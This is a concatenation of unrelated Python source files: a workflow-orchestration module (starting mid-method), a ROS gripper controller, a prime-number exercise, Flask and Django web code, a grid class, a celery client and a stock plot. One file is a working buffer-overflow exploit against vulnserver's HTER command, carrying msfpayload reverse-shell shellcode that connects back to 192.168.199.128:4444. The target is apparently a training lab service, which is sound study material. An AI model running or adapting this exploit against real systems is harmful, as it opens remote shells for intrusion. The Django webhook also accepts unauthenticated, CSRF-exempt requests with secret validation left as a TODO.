work = self.works[k]
self.log_debug("work %s is_terminated(%s:%s)" % (work.get_internal_id(), work.is_terminated(), work.get_status()))
for work in [self.works[k] for k in self.new_to_run_works]:
if work.transforming:
self.new_to_run_works.remove(work.get_internal_id())
self.current_running_works.append(work.get_internal_id())
for work in [self.works[k] for k in self.current_running_works]:
if isinstance(work, Workflow):
work.sync_works()
if work.is_terminated():
self.log_debug("work %s is_terminated, sync_global_parameters_from_work" % (work.get_internal_id()))
self.set_source_parameters(work.get_internal_id())
self.sync_global_parameters_from_work(work)
if work.get_internal_id() in self.work_conds:
self.log_debug("Work %s has condition dependencies %s" % (work.get_internal_id(),
json_dumps(self.work_conds[work.get_internal_id()], sort_keys=True, indent=4)))
for cond_id in self.work_conds[work.get_internal_id()]:
cond = self.conditions[cond_id]
                        self.log_debug("Work %s has condition dependency %s" % (work.get_internal_id(),
json_dumps(cond, sort_keys=True, indent=4)))
self.enable_next_works(work, cond)
if work.is_terminated():
self.log_info("Work %s is terminated(%s)" % (work.get_internal_id(), work.get_status()))
self.log_debug("Work conditions: %s" % json_dumps(self.work_conds, sort_keys=True, indent=4))
if work.get_internal_id() not in self.work_conds:
# has no next work
self.log_info("Work %s has no condition dependencies" % work.get_internal_id())
self.terminated_works.append(work.get_internal_id())
self.current_running_works.remove(work.get_internal_id())
else:
# self.log_debug("Work %s has condition dependencies %s" % (work.get_internal_id(),
# json_dumps(self.work_conds[work.get_template_id()], sort_keys=True, indent=4)))
# for cond in self.work_conds[work.get_template_id()]:
# self.enable_next_works(work, cond)
self.terminated_works.append(work.get_internal_id())
self.current_running_works.remove(work.get_internal_id())
if work.is_finished():
self.num_finished_works += 1
elif work.is_subfinished():
self.num_subfinished_works += 1
elif work.is_failed():
self.num_failed_works += 1
elif work.is_expired():
self.num_expired_works += 1
elif work.is_cancelled():
self.num_cancelled_works += 1
elif work.is_suspended():
self.num_suspended_works += 1
# if work.is_terminated():
# # if it's a loop workflow, to generate new loop
# if isinstance(work, Workflow):
# work.sync_works()
log_str = "num_total_works: %s" % self.num_total_works
log_str += ", num_finished_works: %s" % self.num_finished_works
log_str += ", num_subfinished_works: %s" % self.num_subfinished_works
log_str += ", num_failed_works: %s" % self.num_failed_works
log_str += ", num_expired_works: %s" % self.num_expired_works
log_str += ", num_cancelled_works: %s" % self.num_cancelled_works
log_str += ", num_suspended_works: %s" % self.num_suspended_works
self.log_debug(log_str)
self.refresh_works()
def resume_works(self):
self.num_subfinished_works = 0
self.num_finished_works = 0
self.num_failed_works = 0
self.num_cancelled_works = 0
self.num_suspended_works = 0
self.num_expired_works = 0
self.last_updated_at = datetime.datetime.utcnow()
t_works = self.terminated_works
self.terminated_works = []
self.current_running_works = self.current_running_works + t_works
for work in [self.works[k] for k in self.current_running_works]:
if isinstance(work, Workflow):
work.resume_works()
else:
work.resume_work()
def get_relation_data(self, work):
ret = {'work': {'workload_id': work.workload_id,
'external_id': work.external_id}}
next_works = work.next_works
if next_works:
next_works_data = []
for next_id in next_works:
next_work = self.works[next_id]
if isinstance(next_work, Workflow):
next_work_data = next_work.get_relation_map()
else:
next_work_data = self.get_relation_data(next_work)
next_works_data.append(next_work_data)
ret['next_works'] = next_works_data
return ret
def get_relation_map(self):
ret = []
init_works = self.init_works
for internal_id in init_works:
work_data = self.get_relation_data(self.works[internal_id])
ret.append(work_data)
return ret
def clean_works(self):
self.num_subfinished_works = 0
self.num_finished_works = 0
self.num_failed_works = 0
self.num_cancelled_works = 0
self.num_suspended_works = 0
self.num_expired_works = 0
self.num_total_works = 0
self.last_updated_at = datetime.datetime.utcnow()
self.terminated_works = []
self.current_running_works = []
self.works = {}
self.work_sequence = {} # order list
self.first_initial = False
self.new_to_run_works = []
def get_exact_workflows(self):
"""
*** Function called by Clerk agent.
TODO: The primary dataset for the initial work is a dataset with '*'.
workflow.primary_initial_collection = 'some datasets with *'
collections = get_collection(workflow.primary_initial_collection)
wfs = []
for coll in collections:
wf = self.copy()
wf.name = self.name + "_" + number
wf.primary_initial_collection = coll
wfs.append(wf)
return wfs
"""
return [self]
def is_terminated(self):
"""
*** Function called by Marshaller agent.
"""
self.sync_works()
if len(self.new_to_run_works) == 0 and len(self.current_running_works) == 0:
return True
return False
def is_finished(self):
"""
*** Function called by Marshaller agent.
"""
return self.is_terminated() and self.num_finished_works == self.num_total_works
def is_subfinished(self):
"""
*** Function called by Marshaller agent.
"""
return self.is_terminated() and (self.num_finished_works + self.num_subfinished_works > 0 and self.num_finished_works + self.num_subfinished_works <= self.num_total_works)
def is_failed(self):
"""
*** Function called by Marshaller agent.
"""
return self.is_terminated() and (self.num_failed_works > 0) and (self.num_cancelled_works == 0) and (self.num_suspended_works == 0) and (self.num_expired_works == 0)
def is_to_expire(self, expired_at=None, pending_time=None, request_id=None):
if self.expired:
# it's already expired. avoid sending duplicated messages again and again.
return False
if expired_at:
if type(expired_at) in [str]:
expired_at = str_to_date(expired_at)
if expired_at < datetime.datetime.utcnow():
self.logger.info("Request(%s) expired_at(%s) is smaller than utc now(%s), expiring" % (request_id,
expired_at,
datetime.datetime.utcnow()))
return True
act_pending_time = None
if self.pending_time:
# in days
act_pending_time = float(self.pending_time)
else:
if pending_time:
act_pending_time = float(pending_time)
if act_pending_time:
act_pending_seconds = int(86400 * act_pending_time)
if self.last_updated_at + datetime.timedelta(seconds=act_pending_seconds) < datetime.datetime.utcnow():
log_str = "Request(%s) last updated at(%s) + pending seconds(%s)" % (request_id,
self.last_updated_at,
act_pending_seconds)
log_str += " is smaller than utc now(%s), expiring" % (datetime.datetime.utcnow())
self.logger.info(log_str)
return True
return False
def is_expired(self):
"""
*** Function called by Marshaller agent.
"""
# return self.is_terminated() and (self.num_expired_works > 0)
return self.is_terminated() and self.expired
def is_cancelled(self):
"""
*** Function called by Marshaller agent.
"""
return self.is_terminated() and (self.num_cancelled_works > 0)
def is_suspended(self):
"""
*** Function called by Marshaller agent.
"""
return self.is_terminated() and (self.num_suspended_works > 0)
def get_terminated_msg(self):
"""
*** Function called by Marshaller agent.
"""
if self.last_work:
return self.works[self.last_work].get_terminated_msg()
return None
def get_status(self):
if self.is_terminated():
if self.is_finished():
return WorkStatus.Finished
elif self.is_subfinished():
return WorkStatus.SubFinished
elif self.is_failed():
return WorkStatus.Failed
elif self.is_expired():
return WorkStatus.Expired
elif self.is_cancelled():
return WorkStatus.Cancelled
elif self.is_suspended():
return WorkStatus.Suspended
return WorkStatus.Transforming
def depend_on(self, work):
return False
def add_proxy(self):
self.proxy = get_proxy()
if not self.proxy:
raise Exception("Cannot get local proxy")
def get_proxy(self):
return self.proxy
class Workflow(Base):
def __init__(self, name=None, workload_id=None, lifetime=None, pending_time=None, logger=None):
# super(Workflow, self).__init__(name=name, workload_id=workload_id, lifetime=lifetime, pending_time=pending_time, logger=logger)
self.logger = logger
if self.logger is None:
self.setup_logger()
self.template = WorkflowBase(name=name, workload_id=workload_id, lifetime=lifetime, pending_time=pending_time, logger=logger)
self.parent_num_run = None
self._num_run = 0
self.runs = {}
self.loop_condition_position = 'end'
def setup_logger(self):
# Setup logger
self.logger = logging.getLogger(self.get_class_name())
def __deepcopy__(self, memo):
logger = self.logger
self.logger = None
cls = self.__class__
result = cls.__new__(cls)
memo[id(self)] = result
# Deep copy all other attributes
for k, v in self.__dict__.items():
setattr(result, k, copy.deepcopy(v, memo))
self.logger = logger
result.logger = logger
return result
@property
def metadata(self):
run_metadata = {'parent_num_run': self.parent_num_run,
'num_run': self._num_run,
'runs': {}}
for run_id in self.runs:
run_metadata['runs'][run_id] = self.runs[run_id].metadata
if not self.runs:
run_metadata['parameter_links'] = self.template.get_parameter_links_metadata()
return run_metadata
@metadata.setter
def metadata(self, value):
run_metadata = value
self.parent_num_run = run_metadata['parent_num_run']
self._num_run = run_metadata['num_run']
runs = run_metadata['runs']
if not runs and 'parameter_links' in run_metadata:
parameter_links = run_metadata['parameter_links']
self.template.set_parameter_links_metadata(parameter_links)
for run_id in runs:
self.runs[run_id] = self.template.copy()
self.runs[run_id].metadata = runs[run_id]
# self.add_metadata_item('runs', )
@property
def independent_works(self):
if self.runs:
return self.runs[str(self.num_run)].independent_works
return self.template.independent_works
@independent_works.setter
def independent_works(self, value):
if self.runs:
self.runs[str(self.num_run)].independent_works = value
self.template.independent_works = value
@property
def last_updated_at(self):
if self.runs:
return self.runs[str(self.num_run)].last_updated_at
return None
@last_updated_at.setter
def last_updated_at(self, value):
if self.runs:
self.runs[str(self.num_run)].last_updated_at = value
@property
def name(self):
return self.template.name
@name.setter
def name(self, value):
self.template.name = value
@property
def username(self):
return self.template.username
@username.setter
def username(self, value):
self.template.username = value
@property
def userdn(self):
return self.template.userdn
@userdn.setter
def userdn(self, value):
self.template.userdn = value
@property
def lifetime(self):
return self.template.lifetime
@lifetime.setter
def lifetime(self, value):
self.template.lifetime = value
@property
def num_run(self):
if self.parent_num_run:
return self.parent_num_run * 100 + self._num_run
return self._num_run
@num_run.setter
def num_run(self, value):
if self.parent_num_run:
self._num_run = value - self.parent_num_run * 100
else:
self._num_run = value
@property
def transforming(self):
if self.runs and str(self.num_run) in self.runs:
return True
return False
@transforming.setter
def transforming(self, value):
if self._num_run < 1:
self._num_run = 1
if str(self.num_run) not in self.runs:
self.runs[str(self.num_run)] = self.template.copy()
if self.runs[str(self.num_run)].has_loop_condition():
self.runs[str(self.num_run)].num_run = self.num_run
if self._num_run > 1:
p_metadata = self.runs[str(self.num_run - 1)].get_metadata_item('parameter_links')
self.runs[str(self.num_run)].add_metadata_item('parameter_links', p_metadata)
def set_workload_id(self, workload_id):
if self.runs:
self.runs[str(self.num_run)].workload_id = workload_id
else:
self.template.workload_id = workload_id
# self.dynamic.workload_id = workload_id
def get_internal_id(self):
if self.runs:
return self.runs[str(self.num_run)].get_internal_id()
return self.template.get_internal_id()
def get_workload_id(self):
if self.runs:
return self.runs[str(self.num_run)].workload_id
return self.template.workload_id
def add_work(self, work, initial=False, primary=False):
self.template.add_work(work, initial, primary)
def add_condition(self, cond):
self.template.add_condition(cond)
def add_parameter_link(self, work_source, work_destinations, parameter_link):
self.template.add_parameter_link(work_source, work_destinations, parameter_link)
def find_workflow_from_work(self, work):
return self.template.find_workflow_from_work(work)
def find_parameter_links_from_id(self, internal_id):
if self.runs:
return self.runs[str(self.num_run)].find_parameter_links_from_id(internal_id)
return self.template.find_parameter_links_from_id(internal_id)
def refresh_parameter_links(self):
if self.runs:
self.runs[str(self.num_run)].refresh_parameter_links()
def set_global_parameters(self, value):
self.template.set_global_parameters(value)
def sync_global_parameters_from_work(self, work):
if self.runs:
return self.runs[str(self.num_run)].sync_global_parameters_from_work(work)
return self.template.sync_global_parameters_from_work(work)
def get_new_works(self):
self.sync_works()
if self.runs:
return self.runs[str(self.num_run)].get_new_works()
return []
def get_current_works(self):
self.sync_works()
if self.runs:
return self.runs[str(self.num_run)].get_current_works()
return []
def get_all_works(self):
self.sync_works()
if self.runs:
return self.runs[str(self.num_run)].get_all_works()
return []
def get_primary_initial_collection(self):
if self.runs:
return self.runs[str(self.num_run)].get_primary_initial_collection()
return self.template.get_primary_initial_collection()
def resume_works(self):
if self.runs:
self.runs[str(self.num_run)].resume_works()
def clean_works(self):
# if self.runs:
# self.runs[str(self.num_run)].clean_works()
self.parent_num_run = None
self._num_run = 0
self.runs = {}
def is_to_expire(self, expired_at=None, pending_time=None, request_id=None):
if self.runs:
return self.runs[str(self.num_run)].is_to_expire(expired_at=expired_at, pending_time=pending_time, request_id=request_id)
return False
def is_terminated(self):
if self.runs:
if self.runs[str(self.num_run)].is_terminated():
if not self.runs[str(self.num_run)].has_loop_condition() or not self.runs[str(self.num_run)].get_loop_condition_status():
return True
return False
def is_finished(self):
if self.is_terminated():
return self.runs[str(self.num_run)].is_finished()
return False
def is_subfinished(self):
if self.is_terminated():
return self.runs[str(self.num_run)].is_subfinished()
return False
def is_failed(self):
if self.is_terminated():
return self.runs[str(self.num_run)].is_failed()
return False
def is_expired(self):
if self.is_terminated():
return self.runs[str(self.num_run)].is_expired()
return False
def is_cancelled(self):
if self.is_terminated():
return self.runs[str(self.num_run)].is_cancelled()
return False
def is_suspended(self):
if self.is_terminated():
return self.runs[str(self.num_run)].is_suspended()
return False
def get_terminated_msg(self):
if self.is_terminated():
return self.runs[str(self.num_run)].get_terminated_msg()
return None
def get_status(self):
if not self.runs:
return WorkStatus.New
if not self.is_terminated():
return WorkStatus.Transforming
return self.runs[str(self.num_run)].get_status()
def depend_on(self, work):
return self.template.depend_on(work)
def add_proxy(self):
self.template.add_proxy()
def get_proxy(self):
        return self.template.get_proxy()
def add_loop_condition(self, condition, position='end'):
if not position or position != 'begin':
position = 'end'
position = 'end' # force position to end currently. position = 'begin' is not supported now.
self.template.add_loop_condition(condition, position=position)
self.loop_condition_position = position
def refresh_works(self):
if self.runs:
self.runs[str(self.num_run)].refresh_works()
def sync_works(self):
# position is end.
if self._num_run < 1:
self._num_run = 1
if str(self.num_run) not in self.runs:
self.runs[str(self.num_run)] = self.template.copy()
if self.runs[str(self.num_run)].has_loop_condition():
self.runs[str(self.num_run)].num_run = self._num_run
if self._num_run > 1:
p_metadata = self.runs[str(self.num_run - 1)].get_metadata_item('parameter_links')
self.runs[str(self.num_run)].add_metadata_item('parameter_links', p_metadata)
self.runs[str(self.num_run)].sync_works()
if self.runs[str(self.num_run)].is_terminated():
if self.runs[str(self.num_run)].has_loop_condition():
if self.runs[str(self.num_run)].get_loop_condition_status():
self._num_run += 1
self.runs[str(self.num_run)] = self.template.copy()
self.runs[str(self.num_run)].num_run = self._num_run
p_metadata = self.runs[str(self.num_run - 1)].get_metadata_item('parameter_links')
self.runs[str(self.num_run)].add_metadata_item('parameter_links', p_metadata)
def get_relation_map(self):
if not self.runs:
return []
if self.template.has_loop_condition():
rets = {}
for run in self.runs:
rets[run] = self.runs[run].get_relation_map()
return [rets]
else:
return self.runs[str(self.num_run)].get_relation_map()
class SubWorkflow(Workflow):
def __init__(self, name=None, workload_id=None, lifetime=None, pending_time=None, logger=None):
# Init a workflow.
super(SubWorkflow, self).__init__(name=name, workload_id=workload_id, lifetime=lifetime, pending_time=pending_time, logger=logger)
class LoopWorkflow(Workflow):
def __init__(self, name=None, workload_id=None, lifetime=None, pending_time=None, logger=None):
# Init a workflow.
super(LoopWorkflow, self).__init__(name=name, workload_id=workload_id, lifetime=lifetime, pending_time=pending_time, logger=logger)
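# Illustrative sketch (not part of the original module): assembling a small workflow from
# the pieces above. work_a and work_b are assumed to be pre-built Work instances and
# parameter_link a ParameterLink; only the wiring calls come from this module.
def _example_workflow_assembly(work_a, work_b, parameter_link):
    wf = Workflow(name='example_workflow')
    wf.add_work(work_a, initial=True, primary=True)
    wf.add_work(work_b)
    # start work_b only once work_a has finished successfully
    wf.add_condition(Condition(cond=work_a.is_finished, true_work=work_b))
    # forward selected attributes of work_a to work_b when work_a terminates
    wf.add_parameter_link(work_a, work_b, parameter_link)
    return wf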
|
#!/usr/bin/env python3
import rospy
from onrobot_vg_msgs.msg import OnRobotVGOutput
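# Note (added for clarity, inferred from how the fields are used below rather than from the
# message definition itself): rMCA/rMCB appear to be the mode/command words for channels A
# and B (0x0100 = vacuum on, 0x0000 = release), while rVCA/rVCB carry the requested vacuum
# level in the range 0-255.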
def genCommand(char, command):
"""Updates the command according to the character entered by the user."""
if char == 'g':
command.rMCA = 0x0100
command.rVCA = 255
command.rMCB = 0x0100
command.rVCB = 255
if char == 'r':
command.rMCA = 0x0000
command.rVCA = 0
command.rMCB = 0x0000
command.rVCB = 0
if char == 'ga':
command.rMCA = 0x0100
command.rVCA = 255
if char == 'ra':
command.rMCA = 0x0000
command.rVCA = 0
if char == 'gb':
command.rMCB = 0x0100
command.rVCB = 255
if char == 'rb':
command.rMCB = 0x0000
command.rVCB = 0
    # If the command entered is an integer, use it as the vacuum power for both channels
try:
if int(char) == 0:
command.rMCA = 0x0000
command.rVCA = 0
command.rMCB = 0x0000
command.rVCB = 0
else:
command.rMCA = 0x0100
command.rVCA = min(255, int(char))
command.rMCB = 0x0100
command.rVCB = min(255, int(char))
except ValueError:
pass
return command
def askForCommand(command):
"""Asks the user for a command to send to the gripper."""
currentCommand = 'Simple OnRobot VG Controller\n-----\nCurrent command:'
currentCommand += ' rMCA = ' + str(command.rMCA)
currentCommand += ', rVCA = ' + str(command.rVCA)
currentCommand += ', rMCB = ' + str(command.rMCB)
currentCommand += ', rVCB = ' + str(command.rVCB)
rospy.loginfo(currentCommand)
strAskForCommand = '-----\nAvailable commands\n\n'
strAskForCommand += 'g: Turn on all channels\n'
strAskForCommand += 'r: Turn off all channels\n'
strAskForCommand += 'ga: Turn on channel A\n'
strAskForCommand += 'ra: Turn off channel A\n'
strAskForCommand += 'gb: Turn on channel B\n'
strAskForCommand += 'rb: Turn off channel B\n'
strAskForCommand += '(0 - 255): Set vacuum power for all channels\n'
strAskForCommand += '-->'
return input(strAskForCommand)
def publisher():
"""Main loop which requests new commands and
    publishes them on the OnRobotVGOutput topic.
"""
rospy.init_node('OnRobotVGSimpleController', log_level=rospy.DEBUG)
pub = rospy.Publisher('OnRobotVGOutput', OnRobotVGOutput, queue_size=1)
command = OnRobotVGOutput()
while not rospy.is_shutdown():
command = genCommand(askForCommand(command), command)
pub.publish(command)
rospy.sleep(0.1)
if __name__ == '__main__':
publisher()
|
# DESAFIO 052
# Write a program that reads an integer and says whether or not it is a prime number.
num = int(input('Enter a number: '))
total = 0
for c in range(1, num + 1):
    if num % c == 0:
        print(c, end=' ')
        total += 1
if total == 2:
    print(f'\nThe number {num} is a PRIME NUMBER')
else:
    print(f'\nThe number {num} is NOT a PRIME NUMBER')
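# Alternative sketch (not part of the original exercise): the same primality test can stop at
# the square root of num instead of counting every divisor, which is much faster for large
# inputs; shown here only as a comparison with the loop above.
def is_prime(n):
    if n < 2:
        return False
    d = 2
    while d * d <= n:
        if n % d == 0:
            return False
        d += 1
    return True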
|
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from flask import Flask, make_response, render_template, request
# Import the helper functions
from identitytoolkit import gitkitclient
app = Flask(__name__)
app.debug = True
# Import the configuration file you downloaded from Google Developer Console
gitkit_instance = gitkitclient.GitkitClient.FromConfigFile(
'gitkit-server-config.json')
@app.route("/", methods=['GET', 'POST'])
def index():
text = "You are not signed in."
# Check for and read the Google Identity Toolkit token if present
if 'gtoken' in request.cookies:
gitkit_user = gitkit_instance.VerifyGitkitToken(request.cookies['gtoken'])
if gitkit_user:
text = "Welcome " + gitkit_user.email + "! Your user info is: " + str(vars(gitkit_user))
response = make_response(render_template('index.html', CONTENT=text))
response.headers['Content-Type'] = 'text/html'
return response
@app.route("/widget", methods=['GET', 'POST'])
def signInPage():
response = make_response(render_template('widget.html'))
# OPTIONAL (only for Yahoo support): Take information sent by POST request to the sign-in-page and forward it to the Javascript
#post_body = ''
#if request.method == 'POST':
# post_body = urlencode(request.data)
#response = make_response(render_template('sign-in-page.html',
# POST_BODY=post_body))
response.headers['Content-Type'] = 'text/html'
return response
if __name__ == "__main__":
app.run(port=8000)
|
from typing import Tuple, List, Optional
import torch
import numpy as np
from colorama import Fore
from texrel import things
class Grid(object):
"""
first coordinate is row, top to bottom; second is column, left to right
"""
def __init__(self, size):
self.size = size
self.grid: List[List[Optional[things.ShapeColor]]] = []
for i in range(size):
row = []
for j in range(size):
row.append(None)
self.grid.append(row)
self.objects_set = []
def __eq__(self, b: object) -> bool:
if not isinstance(b, self.__class__):
return False
return self.grid == b.grid
def add_object(self, pos: Tuple[int, int], o: things.ShapeColor):
assert self.grid[pos[0]][pos[1]] is None
self.grid[pos[0]][pos[1]] = o
self.objects_set.append(o)
return self
def get_pos_for_object(self, o: things.ShapeColor) -> Tuple[int, int]:
"""
warning: slow
first coordinate is y (ie vert), second coordinate is x (ie horiz)
(this is mostly historical, because of how __repr__ function works,
not sure I agree with this in hindsight...)
"""
for i in range(self.size):
for j in range(self.size):
if self.grid[i][j] == o:
return (i, j)
raise ValueError()
def as_shape_color_tensors(self) -> Tuple[torch.Tensor, torch.Tensor]:
shapes = torch.zeros((self.size, self.size), dtype=torch.int64)
colors = torch.zeros((self.size, self.size), dtype=torch.int64)
for i in range(self.size):
for j in range(self.size):
o: Optional[things.ShapeColor] = self.grid[i][j]
if o is None:
continue
shapes[i, j] = o.shape + 1
colors[i, j] = o.color + 1
return shapes, colors
def __repr__(self) -> str:
res_l = []
for i in range(self.size):
row = ''
for j in range(self.size):
o = self.grid[i][j]
if o is None:
row += '.'
else:
fore_color = things._colors[o.color]
row += fore_color
row += things._shapes[o.shape]
row += Fore.RESET
res_l.append(row)
return '\n'.join(res_l)
def render(self) -> None:
print(str(self))
def generate_available_pos(self, r: np.random.RandomState) -> Tuple[int, int]:
"""
        returns a position whose cell in the grid is currently empty (None)
"""
pos = None
while pos is None or self.grid[pos[0]][pos[1]] is not None:
pos = r.choice(self.size, 2, replace=True)
pos = tuple(pos)
return pos
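# Illustrative sketch (not part of the original module): building and inspecting a small Grid.
# The things.ShapeColor constructor arguments are assumed to be integer shape/color indices,
# consistent with how as_shape_color_tensors() stores them above; treat the signature as
# hypothetical.
def _example_grid_usage(seed: int = 123) -> Grid:
    r = np.random.RandomState(seed)
    grid = Grid(size=5)
    obj = things.ShapeColor(shape=0, color=1)  # hypothetical constructor signature
    grid.add_object(grid.generate_available_pos(r), obj)
    shapes, colors = grid.as_shape_color_tensors()  # 5x5 int64 tensors, 0 marks empty cells
    grid.render()
    return grid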
|
import socket
import struct
import time
import binascii
print "\nExploitation of HTER Command - Exploit (Reverse Shell)\n"
ip_addr = '192.168.199.130'
port = 9999
# send evil buffer to vulnserver
def send_evil_buffer(evil_buffer):
did_send = False
command = evil_buffer[:5]
print "Sending buffer of length %s to command %s" % (len(evil_buffer), command)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip_addr, int(port)))
except Exception as e:
print "[-] Failed to connect to service %s" % e
else:
print "[+] Connected to server"
# Get banner response
data = s.recv(1024)
print(data)
bytes_sent = s.send(evil_buffer)
print "Sent %s bytes" % bytes_sent
if bytes_sent > 0:
did_send = True
finally:
s.close()
return did_send
###############################################################################
# JMP EAX from essfunc.dll
# 625011B1 FFE0 JMP EAX
jmp_eax = binascii.hexlify(struct.pack("<I", 0x625011B1))
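# Note (added for clarity): HTER appears to treat its argument as an ASCII hex string and to
# convert it to raw bytes before copying, which is why the return address above and the
# shellcode below are kept as hex-encoded text rather than packed binary.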
# msfpayload windows/shell_reverse_tcp LHOST=192.168.199.128 LPORT=4444 EXITFUN=NONE R | msfencode -b '\x00' -t raw > rshell.bin
# hexdump -C rshell.bin | grep -v 00000155 | cut -d" " -f 3-19 | sed -e 's/ //g' | tr -d '\n'
shellcode = "bac1c97739d9cbd97424f45e2bc9b14f31561483eefc035610233c8bd12abf74224c4991135e2dd1066e25b7aa056b2c386ba44389c1926a0ae41a20c867e73b1d47d6f350861fe99bdac86509ca7d3b92eb5137aa93d4885f29d6d8f02690c07b6001f0a8737dbbc547f53a0c96f60c7074c9a07d850d069ef065742302be06ff8723a0743f805058d9435e15ae0c43a863277f2182e80971a02c5121c9753f84f666e77952ec0a6de4af4242da4f93cc6d23a153c5ab891cc32ced36b3a310b9c3ead6ed9384ff8d7855ff5b2e05af338ef50fe4661c80db961f4a6a9188b5c5dac95e14e4d8c29102b0eaf79d2d925d55cf5b48fd6cc917fdfbf28faaacc5d93e417f705c9819bbe447da42e50a6661f5d2672da18a31fb1f6de84dc92747049dbeab97dbbee161030e5c343cbf08b045dda83f9c65d875bccc71d0554d1ce380921960206bde78416e9a3eba02b3aabcb1b4fe"
# the various 90 sleds are to help ensure the PUSH EAX and POP ESP are placed correctly
# and to account for the required 2041 bytes needed to successfully control EIP
shellcode_buffer = '0' + '90'*20 + '505C' + '909090' + '90'*(20) + '9090909090' + shellcode + 'A'*(2040 - 100 - len(shellcode))
print "Shellcode buffer length: %s" % len(shellcode_buffer)
evil_buffer = "HTER " + shellcode_buffer + jmp_eax + 'C' *950
send_evil_buffer(evil_buffer)
|
from celerie_queue.tasks import addTime
import time
if __name__ == '__main__':
for i in range(5):
result = addTime.delay(i)
print('Taking result: ', result)
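# Note (added for clarity): addTime.delay() returns a celery AsyncResult immediately, so the
# print above shows the task handle rather than the computed value; result.get() would block
# until the worker finishes and return the actual result, assuming a result backend is
# configured for the app.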
|
import json
import logging
import time
from django.conf import settings
from django.http import HttpResponse
from django.template.response import TemplateResponse
from django.views.decorators.csrf import csrf_exempt
from rest_framework import viewsets, permissions
from rest_framework.exceptions import NotFound, ValidationError
from rest_framework.generics import ListCreateAPIView, RetrieveAPIView
from rest_framework.response import Response
from rest_framework.views import APIView
from manager.credential_workflow import (
connection_invitation_accept,
credential_offer_create,
credential_offer_accept,
is_credential_request_ready,
connection_invitation_create,
)
from manager.models import (
Schema,
CredentialDefinition,
CredentialRequest,
ConnectionInvitation,
CredentialOffer,
)
from manager.serializers import (
SchemaSerializer,
CredentialDefinitionSerializer,
CredentialRequestSerializer,
)
from manager.utils import EmailHelper
LOGGER = logging.getLogger(__name__)
class SchemaViewSet(viewsets.ModelViewSet):
serializer_class = SchemaSerializer
permission_classes = (permissions.IsAuthenticated,)
queryset = Schema.objects.all()
def perform_create(self, serializer):
serializer.save(creator=self.request.user)
class CredentialDefinitionViewSet(viewsets.ModelViewSet):
serializer_class = CredentialDefinitionSerializer
permission_classes = (permissions.IsAuthenticated,)
queryset = CredentialDefinition.objects.all()
def perform_create(self, serializer):
serializer.save(creator=self.request.user)
class CredentialRequestRetrieveAPIView(RetrieveAPIView):
serializer_class = CredentialRequestSerializer
permission_classes = (permissions.IsAuthenticated,)
queryset = CredentialRequest.objects.all()
class CredentialRequestListCreateAPIView(ListCreateAPIView):
serializer_class = CredentialRequestSerializer
permission_classes = (permissions.IsAuthenticated,)
queryset = CredentialRequest.objects.all()
def perform_create(self, serializer):
serializer.save(creator=self.request.user)
invitation_url = serializer.instance.invitation_url
LOGGER.debug(f"*** Obtain credential url: {invitation_url}")
EmailHelper.send(
serializer.instance.email,
template="invitation",
context={
"credential_name": serializer.instance.credential_definition.name,
"invitation_url": invitation_url,
},
)
class StepCheckAPIView(APIView):
model_class = None
authentication_classes = ()
permission_classes = ()
def get(self, request, format=None):
code = request.query_params.get("code")
model = self.model_class.objects.filter(credential_request__code=code).order_by("-created").first()
if not model:
raise NotFound()
if not model.accepted:
raise ValidationError({"detail": "Not accepted yet"})
return Response()
class ConnectionCheck(StepCheckAPIView):
model_class = ConnectionInvitation
class CredentialCheck(StepCheckAPIView):
model_class = CredentialOffer
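# Note (added for clarity): ConnectionCheck and CredentialCheck are presumably the endpoints
# behind poll_connection_url / poll_credential_url used by the credential_obtain template
# below; they return 200 once the invitation or offer has been accepted, 404 while no record
# exists, and 400 while it is still pending. The URL routing itself lives outside this file.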
def credential_obtain(request):
template_name = "credential_obtain.html"
code = request.GET.get("code")
try:
credential_request = is_credential_request_ready(code)
except Exception as e:
LOGGER.error(f"obtain_credential: code:{code} - error: {e}")
return TemplateResponse(request, template_name, {"error": "Invalid code"})
invitation_url, invitation_b64 = "", ""
connection_invitations = credential_request.connection_invitations.order_by("-created")
if not connection_invitations or not connection_invitations[0].accepted:
invitation_url, invitation_b64 = connection_invitation_create(credential_request)
return TemplateResponse(
request,
template_name,
{
"invitation_url": invitation_url,
"invitation_b64": invitation_b64,
"poll_interval": settings.POLL_INTERVAL,
"poll_max_tries": settings.POLL_MAX_TRIES,
"poll_connection_url": credential_request.connection_invitation_polling_url,
"poll_credential_url": credential_request.credential_offer_polling_url,
},
)
@csrf_exempt
def webhooks(request, topic):
# TODO: validate 'secret' key
try:
message = json.loads(request.body)
state = message.get("state")
LOGGER.info(f"webhook: received: topic: '{topic}' - state: '{state}' - message: {message}")
if topic == "connections" and state == "response":
connection_id = message.get("connection_id")
try:
connection_invitation = connection_invitation_accept(connection_id)
if connection_invitation:
LOGGER.info(f"webhook: processing: connection accepted - connection_id: {connection_id}")
time.sleep(5)
credential_offer_create(connection_id, connection_invitation)
else:
LOGGER.error(f"webhook: connection_invitation_accept: connection_id: {connection_id} not found")
except Exception as e:
LOGGER.error(f"webhook: connection_accepted: connection_id: {connection_id} - error: {e}")
elif topic == "issue_credential" and state == "credential_issued":
connection_id = message.get("connection_id")
try:
accepted_credential_offer = credential_offer_accept(connection_id)
if accepted_credential_offer:
LOGGER.info(f"webhook: processing: credential accepted - connection_id: {connection_id}")
else:
LOGGER.error(f"webhook: credential_offer_accept: connection_id: {connection_id} not found")
except Exception as e:
LOGGER.error(f"webhook: issue_credential: connection_id: {connection_id} - error: {e}")
else:
LOGGER.info(f"webhook: topic: {topic} and state: {state} is invalid")
except Exception as e:
LOGGER.info(f"webhook: {topic} : bad request: '{request.body}' - {e}")
return HttpResponse()
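# Illustrative request shapes for the webhook handler above. This is only a
# sketch: the field names ("state", "connection_id") are the ones read by
# webhooks(), while the URL prefix and the id values are hypothetical.
#
#   POST .../webhooks/connections        {"state": "response", "connection_id": "abc-123"}
#   POST .../webhooks/issue_credential   {"state": "credential_issued", "connection_id": "abc-123"}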
|
# -*- coding: utf-8 -*-
"""SimpleStockPlot.ipynb"""
import matplotlib.pyplot as plt
import yfinance as yf
data = yf.download('tsla', '2020-10-10', '2020-10-20')
data.Close.plot(marker='o')
plt.show()  # display the figure when the script is run outside a notebook
|
